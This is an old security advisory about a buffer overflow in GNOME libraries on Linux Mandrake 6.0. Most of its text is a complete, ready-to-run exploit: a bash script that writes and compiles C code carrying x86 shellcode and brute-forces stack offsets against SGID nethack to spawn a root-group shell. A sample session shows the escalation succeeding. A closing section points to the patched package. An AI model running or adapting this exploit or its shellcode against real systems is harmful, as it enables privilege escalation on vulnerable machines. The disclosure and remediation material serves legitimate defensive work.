COMMAND

    GNOME

SYSTEMS AFFECTED

    Linux Mandrake

PROBLEM

    Brock Tellier found the following.  Virtually any program using the
    GNOME libraries is vulnerable to a buffer overflow attack.  The
    attack takes the form:

        /path/to/gnome/prog --enable-sound --espeaker=$80bytebuffer

    The following exploit should work against any GNOME program, though
    it was tested on (the irony) /usr/games/nethack, which is SGID root
    by default on RH6.0.  An attack on any such program will look
    something like this:

    [xnec@redhack gnox]$ uname -a; cat /etc/redhat-release; id
    Linux redhack 2.2.9-19mdk #1 Wed May 19 19:53:00 GMT 1999 i686 unknown
    Linux Mandrake release 6.0 (Venus)
    uid=501(xnec) gid=501(xnec) groups=501(xnec)
    [xnec@redhack gnox]$ ./gnox.sh
    Building /tmp/gnox.c...
    ...done!
    Building /tmp/gn.c...
    ...done!
    Compiling /tmp/gnox...
    ...done!
    Compiling /tmp/gn...
    ...done!
    Launching attack...

    ... pages and pages of segfaults

    Generic GNOME exploit for Linux x86
    Brock Tellier btellier@webley.com

    Using addr: 0xbffff988  buflen:90  offset:208
    Can't resolve host name "ë^1AFF
                                                                      °
                                                                      óV

    I1UØ@IèÜÿÿÿ/tmp/gnùÿ¿ùÿ¿Xúÿ¿Z"!
    before: uid=501, euid=501, gid=501, egid=0
    after: uid=501, euid=501, gid=0, egid=0
    [xnec@redhack gnomehack]$ id
    uid=501(xnec) gid=0(root) groups=501(xnec)

    gnox.sh follows:

    #!/bin/bash
    # Generic exploit for GNOME apps under Linux x86
    # Our overflowed buffer is just 80 bytes so we'll have to get our settings
    # just so.  Hence the shell script.
    #
    # This should work against any su/gid GNOME program.  The only one that comes
    # with RH6.0 that is su/gid root is (the irony is killing me) nethack.
    #
    # Change the /usr/games/nethack statement in the while loop below to exploit
    # a different program.
    #
    # -Brock Tellier btellier@webley.com

    echo "Building /tmp/gnox.c..."
    cat > /tmp/gnox.c <<EOF
    /*
     * Generic GNOME overflow exploit for Linux x86, tested on RH6.0
     * Will work against any program using the GNOME libraries in the form
     * Keep your BUFSIZ at 90 and only modify your offset
     *
     */


    #include <stdlib.h>
    #include <stdio.h>

    char gnoshell[]= /* Generic Linux x86 shellcode modified to run our
    program */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/tmp/gn";

    #define LEN 120
    #define BUFLEN 90 /* no need to change this */
    #define NOP 0x90
    #define DEFAULT_OFFSET 300

    unsigned long get_sp(void) {

    __asm__("movl %esp, %eax");

    }

    void main(int argc, char *argv[]) {

    int offset, i;
    int buflen = BUFLEN;
    long int addr;
    char buf[BUFLEN];
    char gnobuf[LEN];
    if(argc > 2) {
      fprintf(stderr, "Error: Usage: %s <offset>\n", argv[0]);
      exit(0);
    }
     else if (argc == 2){
       offset=atoi(argv[1]);
     }
     else {
       offset=DEFAULT_OFFSET;
     }


    addr=get_sp();

    fprintf(stderr, "Generic GNOME exploit for Linux x86\n");
    fprintf(stderr, "Brock Tellier btellier@webley.com\n\n");
    fprintf(stderr, "Using addr: 0x%x  buflen:%d  offset:%d\n", addr-offset,
    buflen, offset);

    memset(buf,NOP,buflen);
    memcpy(buf+35,gnoshell,strlen(gnoshell));
    for(i=35+strlen(gnoshell);i<buflen-4;i+=4)
            *(int *)&buf[i]=addr-offset;

    sprintf(gnobuf, "--enable-sound --espeaker=%s", buf);
    for(i=0;i<strlen(gnobuf);i++)
            putchar(gnobuf[i]);

    }
    EOF

    echo "...done!"

    echo "Building /tmp/gn.c..."

    cat > /tmp/gn.c <<EOF
    #include <unistd.h>

    void main() {
      printf("before: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(),
    geteuid(), getgid(), getegid());

      setreuid(geteuid(), geteuid());
      setregid(getegid(), getegid());

      printf("after: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(),
    geteuid(), getgid(), getegid());

      system("/bin/bash");
    }
    EOF

    echo "...done!"

    echo "Compiling /tmp/gnox..."
    gcc -o /tmp/gnox /tmp/gnox.c
    echo "...done!"

    echo "Compiling /tmp/gn..."
    gcc -o /tmp/gn /tmp/gn.c
    echo "...done!"

    echo "Launching attack..."

    offset=0

    while [ $offset -lt 10000 ]; do
        /usr/games/nethack `/tmp/gnox $offset`
        offset=`expr $offset + 4`
    done

    echo "...done!"

SOLUTION

    This could be reproduced with gnome-libs 1.0.8 but not with
    gnome-libs 1.0.15.  The fixed package is available from the updates
    mirror, see:

        http://www.linux-mandrake.com/en/fupdates.php3

    or launch MandrakeUpdate.  Note that the security update applies
    only to the 6.0 version; as of 6.1 the package was removed.  It is
    advised to remove the package completely from your system if you
    are a security maniac (and who isn't?).